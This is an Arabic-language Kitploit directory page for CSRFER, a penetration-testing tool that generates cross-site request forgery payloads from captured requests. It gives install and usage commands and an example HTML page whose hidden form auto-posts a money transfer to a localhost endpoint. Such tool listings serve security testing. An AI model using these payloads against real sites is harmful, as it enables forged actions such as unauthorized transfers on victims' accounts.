Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CSRFER — أداة لتوليد حمولات csrf بناءً على الطلبات الضعيفة | Kitploit
أدوات/GitHubGitHub/luisfontes19/csrfer
توليد الحمولةاستغلال تطبيقات الويباختبار الاختراق
GitHubluisfontes19/csrfer

CSRFER

أداة لتوليد حمولات csrf بناءً على الطلبات الضعيفة

عرض المستودع
64141منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CSRFER

root@kitploit:~

 _____  _________________ ___________ 
/  __ \/  ___| ___ \  ___|  ___| ___ \
| /  \/\ `--.| |_/ / |_  | |__ | |_/ /
| |     `--. \    /|  _| |  __||    / 
| \__/\/\__/ / |\ \| |   | |___| |\ \ 
 \____/\____/\_| \_\_|   \____/\_| \_|
                                      
          -.--.
          )  " '-,
          ',' 2  \_
           \q \ .  \
        _.--'  '----.__
       /  ._      _.__ \__
    _.'_.'  \_ .-._\_ '-, }
   (,/ _.---;-(  . \ \   ~
 ____ (  .___\_\  \/_/
(      '-._ \   \ |
 '._       ),> _) >
    '-._ c='  Cooo  -._
        '-._           '.
            '-._         `\
       snd      '-._       '.
                    '-._     \
                        `~---'

CSRFER هي أداة لتوليد حمولات CSRF بناءً على الطلبات الضعيفة.

تقوم بتحليل الطلبات المُقدَّمة لتوليد إما نموذج (form) أو طلب (fetch). يمكن بعد ذلك تضمين الحمولة في قالب HTML.

التثبيت

root@kitploit:~
npm install -g csrfer

الاستخدام:

root@kitploit:~
الاستخدام: csrfer [options]

الخيارات:
  --version              عرض رقم الإصدار
  -r, --request          مسار ملف الطلب المراد استخدامه
  -m, --mode             الوضع لتوليد الكود. الخيارات المتاحة: form, fetch. (الافتراضي هو form)
  -a, --autosubmit       إرسال الطلب تلقائياً عند تحميل الصفحة
  -s, --show             عرض مدخلات النموذج (فقط لوضع form)
  -o, --output           إخراج الحمولة إلى الملف المحدد بدلاً من STDOUT
  -t, --template         مسار لصفحة قالب HTML. استخدم العنصر النائب {{CONTENT}} لتحديد مكان
                         حقن الكود (في HTML، وليس JavaScript)
  -T, --defaulttemplate  استخدم هذا الخيار إذا كنت تريد حقن الكود في صفحة HTML افتراضية.
  -h, --help             عرض المساعدة

أمثلة:
  csrfer -r req.txt -m form -a                    إرسال طلب نموذج تلقائياً
  csrfer -r req.txt -m form -s                    توليد وعرض نموذج لإرساله يدوياً
  csrfer -r req.txt -m fetch -t my_template.html  توليد طلب fetch واستخدام صفحة القالب المُقدَّمة

مثال على الإخراج

root@kitploit:~
<!DOCTYPE html>
<html>

<head>
  <title>This is Hello World page</title>
</head>

<body>
  <h1>Hello World</h1>

  <form id="csrf" name="csrf" action="http://localhost:8000/1.php" method="POST"
    enctype="application/x-www-form-urlencoded"><input id='destination' name='destination' type='hidden'
      value='123-123123-123' /><br><input id='amount' name='amount' type='hidden' value='50&#x20AC;' /><br><input
      type='submit' value='submit'></form>
</body>

</html>

الترخيص

هذا المشروع مرخص بموجب MIT.

تنزيل الأداة